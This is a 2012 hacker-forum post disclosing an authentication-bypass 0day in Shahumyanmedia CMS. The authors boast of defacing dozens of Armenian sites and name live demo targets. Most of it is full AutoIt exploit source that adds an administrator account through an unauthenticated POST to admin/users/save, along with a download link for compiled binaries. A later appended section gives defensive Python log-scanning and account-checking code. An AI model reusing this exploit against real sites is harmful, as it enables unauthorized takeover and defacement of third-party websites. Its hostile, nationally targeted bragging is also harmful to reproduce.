User: Pr0grammer | 2012-07-23 01:04 GMT
In short, here is our 0day advisory for an Authentication Bypass type vuln that BOT_25 and I found in a shoddy Armenian CMS, exploited, and as a result used to make 30-40 Armenian sites happy.
The exploit may not work on some PCs; I wrote about this in the advisory too. The problem is not on my side; the cause is a bug, unknown to me, in AutoIt's UDF called winhttp.
Most likely the address translation goes wrong, especially on a LAN-type network.
On PPPoE this kind of translation works differently, and that is exactly why it works over a connection established via PPPoE.
Enjooyyyyyyyyyyyy)
Code:
========================================================
Vulnerable Software: Shahumyanmedia CMS © 2010 Shahumyan Media
Official site: http://shahumyanmedia.com/
========================================================
First we want to say: it is not a widely used CMS. Only .am (30-40) sites use it.
This CMS is also commercial.
This CMS is prone to an Authentication Bypass vulnerability and we used it to deface these .am sites. (BTW, nice 0day xD)
But now we are going to 0day it and we will disclose the exploit for it, which was written by us too, as we promised to the @itsec guy. ha ha ha))))))
The exploit is written in the AutoIT programming/scripting language.
*In some cases it may not work for you even if the target site is vulnerable*
This isn't our fault. It is due to the UDF called winhttp being a bit buggy) But it is a really nice UDF.
Anyways, if you want successful exploitation use a PPPoE connection and it will work for you.
You can find the binary of the exploit (32 bit and 64 bit) in the archive; the source code of the exploit is also included.
On successful exploitation it will add a new administrative account to the target site.
We will also disclose "Demo" sites to reproduce the exploitation.
ENjoy)
/AkaStep & BOT_25
========================================================
Source code of Exploit:
NOTE: The exploit was tested on a Win XP SP2 machine against real sites.
Works for me like a charm.
Print screen 1: http://s017.radikal.ru/i434/1207/44/a3737fb99fab.png
Print Screen 2: http://s56.radikal.ru/i151/1207/db/6916d93618a3.png
=====================BEGIN==============================
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Version=beta
#AutoIt3Wrapper_Icon=best.ico
#AutoIt3Wrapper_Outfile=shpoc32.exe
#AutoIt3Wrapper_Outfile_x64=shpoc64.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Compile_Both=y
#AutoIt3Wrapper_UseX64=y
#AutoIt3Wrapper_Res_Comment=AkaStep & BOT_25
#AutoIt3Wrapper_Res_Description=AkaStep & BOT_25
#AutoIt3Wrapper_Res_Fileversion=3.1.6.1
#AutoIt3Wrapper_Res_LegalCopyright=AkaStep & BOT_25
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <GuiStatusBar.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#include "WinHttp.au3"
#include <String.au3>
#cs
This Is a Private Exploit against shahumyanmedia cms.
But for now after a lot of defacement of .am sites we think we can disclosure it.
On success exploiting it will add new administrator to target site.
Vuln type: Authentication Bypass.
VUln anD Exploit Discovered By *AkaStep & BOT_25*
Shoutz to All Azerbaijan Black Hatz!
*Azerbaycana + Turk Qardaslarimiza Atesli Salamlar!*
23 July 2012
Demo 1: www.eurovision.am
Demo 2: safecity.am
And Google for "© 2010 Shahumyan Media"
admin page: eurovision.am/admin/
#ce
$Form1 = GUICreate("shahumyanmedia cms Auth Bypass Exploit", 414, 292, -1, -1)
GUISetBkColor(0x000000)
$Input1 = GUICtrlCreateInput("0dayforyou", 184, 136, 137, 21)
GUICtrlSetLimit(-1,30)
$Input2 = GUICtrlCreateInput("0dayforyou", 184, 176, 137, 21)
GUICtrlSetLimit(-1,30)
$Label1 = GUICtrlCreateLabel("Username", 80, 136, 76, 25, $SS_CENTER)
GUICtrlSetFont(-1, 10, 400, 0, "MS Sans Serif")
GUICtrlSetColor(-1, 0xFF0000)
$Label2 = GUICtrlCreateLabel("Password", 80, 176, 74, 25, $SS_CENTER)
GUICtrlSetFont(-1, 10, 400, 0, "MS Sans Serif")
GUICtrlSetColor(-1, 0xFF0000)
$Exploit = GUICtrlCreateButton("Exploit", 24, 224, 153, 25)
$Label3 = GUICtrlCreateLabel("Target Site", 80, 96, 88, 17)
GUICtrlSetFont(-1, 10, 400, 0, "MS Sans Serif")
GUICtrlSetColor(-1, 0xFF0000)
$Input3 = GUICtrlCreateInput("site.tld", 184, 96, 137, 21)
GUICtrlSetLimit(-1,30)
$About = GUICtrlCreateButton("About", 224, 224, 177, 25)
$StatusBar1 = _GUICtrlStatusBar_Create($Form1)
_GUICtrlStatusBar_SetMinHeight($StatusBar1, 25)
_GUICtrlStatusBar_SetText($StatusBar1,'Idle...')
$Label4 = GUICtrlCreateLabel("0day From Azerbaijan Black Hatz", 24, 24, 362, 36, $SS_CENTER)
GUICtrlSetFont(-1, 14, 400, 0, "MS Sans Serif")
GUICtrlSetColor(-1, 0xFF0000)
$Group1 = GUICtrlCreateGroup("", 8, 8, 401, 201)
GUICtrlCreateGroup("", -99, -99, 1, 1)
GUISetState(@SW_SHOW)
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
$uzanmusdunda_niye_bele_tez_gedirsen=MsgBox(262209,"","Exit?")
if $uzanmusdunda_niye_bele_tez_gedirsen=1 Then
MsgBox(262208,"","Ok...Byee)",10)
Exit
EndIf
Case $Exploit
GUICtrlSetState($Exploit,$GUI_DISABLE)
$askforuniquename=MsgBox(262209,"","Before Proceeding make Sure you are using Unique" & @CRLF & "and Not Existent User name on target site" & @CRLF & _
"Otherwise Exploit may fail for you" & @CRLF & _
"Are you Ready?")
If $askforuniquename=1 Then
_GUICtrlStatusBar_SetText($StatusBar1,'Working... Please Wait...')
Sleep(Random(1000,1800,1)); # Some random sleep.
$targetsite=GUICtrlRead($Input3)
$adduser=GUICtrlRead($Input1)
$addpass=GUICtrlRead($Input2)
blackexploit($targetsite,$adduser,$addpass); passing it to function.
Else
GUICtrlSetState($Exploit,$GUI_ENABLE)
EndIf
Case $About
GUICtrlSetState($About,$GUI_DISABLE)
$creditstoAzerbaijan_blackhatz="This exploit Coded By AkaStep." & @CRLF & _
"The vulnerability Discovered By BOT_25~AkaStep" & @CRLF & "Hope You Will Enjoy while Using It) Meh Meh))))" & @CRLF & "Also Special Respect to My Bro CAMO." & @CRLF & ' WwW.ANTI-armenia.ORG '
MsgBox(262208,"",$creditstoAzerbaijan_blackhatz);
GUICtrlSetState($About,$GUI_ENABLE)
EndSwitch
WEnd
Func blackexploit($targetsite,$adduser,$addpass)
_GUICtrlStatusBar_SetText($StatusBar1,'Opening Connection to Target Site... Please Wait...')
Sleep(Random(1000,1800,1)); # Some random sleep.
#cs
Begin Send Data
#ce
$triggerforsuccess='{"result":1,"message":""}'
$bad1='http://'
$bad2='/'
$targetsite=StringReplace(StringReplace($targetsite,$bad1,''),'/','');# Some CLeanup #
Global $sAddress = $targetsite
$rndstr=Random(156788111,54614128,1) & '@pipi.tld'; xD
$rndmail=$rndstr
;~ Payload to add administrative user. ;~ #
Global $sPostData = "username=" & $adduser & "&password=" &$addpass & "&email=" & $rndmail &"&user_type_id=1&firstname_en=" & $adduser & "&lastname_en=" & $adduser & "&secondname_en=" & $adduser & "&firstname_am=&lastname_am=&secondname_am=&firstname_ru=&lastname_ru=&secondname_ru=&user_id=0&x-technology=ajax"
Global $hOpen = _WinHttpOpen("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4) Gecko/20120122 Netscape6/6.2")
Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
Global $hRequest = _WinHttpOpenRequest($hConnect, _
"POST", _
"admin/users/save", _
Default, _
Default, _
"application/json, text/javascript, */*")
_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-us,en;q=0.5")
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")
_WinHttpAddRequestHeaders($hRequest, "Keep-Alive: 300")
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded; charset=UTF-8")
_WinHttpAddRequestHeaders($hRequest, "X-Requested-With: XMLHttpRequest")
_WinHttpSendRequest($hRequest, -1, $sPostData)
_WinHttpReceiveResponse($hRequest)
Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
$sHeader = _WinHttpQueryHeaders($hRequest)
Do
$sReturned &= _WinHttpReadData($hRequest)
Until @error
;success or fail
if StringInStr($sReturned,$triggerforsuccess) Then
GUICtrlSetState($Exploit,$GUI_ENABLE)
$tolog="Target Site is Vulnerable and exploiting of Vulnerability was Successfull!" & @CRLF & _
_StringRepeat('-',30) & @CRLF & _
'Login Page: ' & $targetsite & '/admin/' & @CRLF & _
'Your Administrative User: ' & $adduser & @CRLF & _
'PassWord: ' & $addpass & @CRLF & _
_StringRepeat('-',30) & @CRLF & 'Enjoy:)'
_GUICtrlStatusBar_SetText($StatusBar1,'Exploit Was Successfull!')
Sleep(300);
FileWrite(@ScriptDir & "\exploitlog.txt",@CRLF & $tolog & @CRLF)
MsgBox(262208,"Exploited!", $tolog)
_GUICtrlStatusBar_SetText($StatusBar1,'Idle...')
Else
GUICtrlSetState($Exploit,$GUI_ENABLE)
_GUICtrlStatusBar_SetText($StatusBar1,'Exploit Failed...')
MsgBox(262192,"Exploit Failed:(","Seems Target Site is not vulnerable...");
_GUICtrlStatusBar_SetText($StatusBar1,'Idle...')
EndIf
Else
_GUICtrlStatusBar_SetText($StatusBar1,'WTF?')
MsgBox(262192, "Error!", "No internet Connection or Incorrect Domain Name?.")
_GUICtrlStatusBar_SetText($StatusBar1,'')
GUICtrlSetState($Exploit,$GUI_ENABLE)
EndIf
_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)
#cs
End SEND DATA
#ce
EndFunc; => blackexploit()
=====================END OF============================
The binary and source you will find in the attachment named: 0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip
MD5 SUM:
=======================================================
$ md5sum 0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip
4cb562fc1fa839e50ea8b6462967ea01 *0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip
=======================================================
http://www.boxca.com/yqwn8h4mhub0/0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip.html
********************* AZERBAIJAN BLACK HATZ***********************************
Of course we never forget our friends, so A BIG RESPECT + THANKS TO ALL:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
===========================================================
Thanks & Respect!
/AkaStep & BOT_25
http://pastebin.com/CvSTw3Xa
http://www.boxca.com/yqwn8h4mhub0/0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip.html
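Added here as a defender's example, not part of the original post or of the CMS: a Python scan that flags POSTs to the endpoint the posted exploit uses, using the User-Agent string and generated e-mail pattern visible in the exploit source, plus a check over an exported user list. The access-log lines are constructed, and the "missing Referer" signal is a heuristic assumption about how the admin UI normally submits the form.

```python
import re

# User-Agent string hardcoded in the posted exploit (taken from the advisory text).
EXPLOIT_UA = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4) Gecko/20120122 Netscape6/6.2"
# Endpoint the exploit POSTs to, and the e-mail pattern it generates (both from the advisory).
TARGET_PATH = "/admin/users/save"
FAKE_MAIL_RE = re.compile(r"^\d+@pipi\.tld$")

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample traffic (documentation IP ranges); not real log data.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Jul/2012:01:10:02 +0000] "GET /admin/ HTTP/1.1" 200 1843 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/14.0"
198.51.100.23 - - [23/Jul/2012:01:12:44 +0000] "POST /admin/users/save HTTP/1.1" 200 25 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4) Gecko/20120122 Netscape6/6.2"
203.0.113.7 - - [23/Jul/2012:01:15:30 +0000] "POST /admin/users/save HTTP/1.1" 200 25 "http://example.am/admin/users" "Mozilla/5.0 (Windows NT 6.1) Firefox/14.0"
"""

def scan_access_log(lines):
    """Return (ip, timestamp, reasons) for each POST to the user-save endpoint
    that looks like the posted exploit rather than an admin's browser session."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] != "POST" or m["path"] != TARGET_PATH:
            continue
        reasons = []
        if m["ua"] == EXPLOIT_UA:
            reasons.append("user-agent matches posted exploit")
        if m["referer"] in ("", "-"):
            # Heuristic assumption: the admin UI's XHR carries a Referer, the exploit sends none.
            reasons.append("no Referer on admin user-save POST")
        if reasons:
            hits.append((m["ip"], m["ts"], reasons))
    return hits

def suspicious_accounts(users):
    """users: iterable of (username, email, user_type_id) rows exported from the CMS.
    Flags admin rows (user_type_id 1, the value the exploit payload sets)
    whose e-mail matches the exploit's generated '<digits>@pipi.tld' pattern."""
    return [u for u in users if u[2] == 1 and FAKE_MAIL_RE.match(u[1])]

if __name__ == "__main__":
    for ip, ts, reasons in scan_access_log(SAMPLE_LOG.splitlines()):
        print(ip, ts, "; ".join(reasons))
```

Any hit from the log scan should be cross-checked against the user table, since the access log never shows the POST body that carried the new account.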